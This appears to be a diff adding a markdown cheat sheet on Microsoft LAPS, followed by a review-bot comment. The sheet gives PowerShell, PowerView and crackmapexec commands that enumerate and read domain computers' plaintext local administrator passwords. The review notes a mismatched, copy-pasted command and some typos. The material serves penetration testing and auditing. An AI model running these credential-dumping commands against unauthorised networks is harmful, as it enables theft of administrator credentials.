|
| 1 | +**LAPS** allows you to manage the local **Administrator** password (which is randomised, unique, and changed regularly) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES. |
| 2 | + |
| 3 | +When using LAPS, 2 new attributes appear in the computer objects of the domain: `ms-mcs-AdmPwd` and `ms-mcs-AdmPwdExpirationTime`. These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes. |
| 4 | + |
| 5 | +# Check If Activated |
| 6 | +```powershell |
| 7 | +reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled |
| 8 | +
|
| 9 | +dir "C:\Program Files\LAPS\CSE" |
| 10 | +
|
| 11 | +# Find GPOs that have "LAPS" or some other descriptive term in the name |
| 12 | +Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl |
| 13 | +
|
| 14 | +# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property) |
| 15 | +Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname |
| 16 | +``` |
| 17 | + |
| 18 | +# Other Commands |
| 19 | +```powershell |
| 20 | +# Get commands available |
| 21 | +Get-Command *AdmPwd* |
| 22 | +
|
| 23 | +# List who can read LAPS password of the given OU |
| 24 | +Find-AdmPwdExtendedRights -Identity Workstations | fl |
| 25 | +
|
| 26 | +# Read the password |
| 27 | +Get-AdmPwdPassword -ComputerName wkstn-2 | fl |
| 28 | +``` |
| 29 | + |
| 30 | +## PowerView |
| 31 | +**PowerView** can also be used to find out **who can read the password and read it**: |
| 32 | +```powershell |
| 33 | +# Find the principals that have ReadPropery on ms-Mcs-AdmPwd |
| 34 | +Get-AdmPwdPassword -ComputerName wkstn-2 | fl |
| 35 | +
|
| 36 | +# Read the password |
| 37 | +Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd |
| 38 | +``` |
| 39 | + |
| 40 | +# Dumping Credentials via crackmapexec |
| 41 | +```bash |
| 42 | +# LDAP |
| 43 | +crackmapexec ldap <ip> -u <user> -p <password> -d <domain> -M laps |
| 44 | + |
| 45 | +# SMB |
| 46 | +crackmapexec smb <ip> -u <user> -p <password> --laps |
| 47 | +``` |
| 48 | + |
| 49 | +# References |
| 50 | +- [https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/laps.html](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/laps.html) |
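Review bot: in the PowerView section (line 33-34), the comment "Find the principals that have ReadPropery on ms-Mcs-AdmPwd" sits above `Get-AdmPwdPassword -ComputerName wkstn-2 | fl`, which is the AdmPwd module cmdlet already shown at line 27 and reads the password rather than enumerating who can read it; the line looks like a copy-paste leftover. Replace it with an actual PowerView ACL query, e.g. `Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -match "ReadProperty" }` (or at least note that this step needs a PowerView ACL cmdlet), and fix the typo "ReadPropery" -> "ReadProperty" in the comment. Minor: line 3 "These attributes contains" should read "These attributes contain", and "2 new attributes" reads better as "two new attributes".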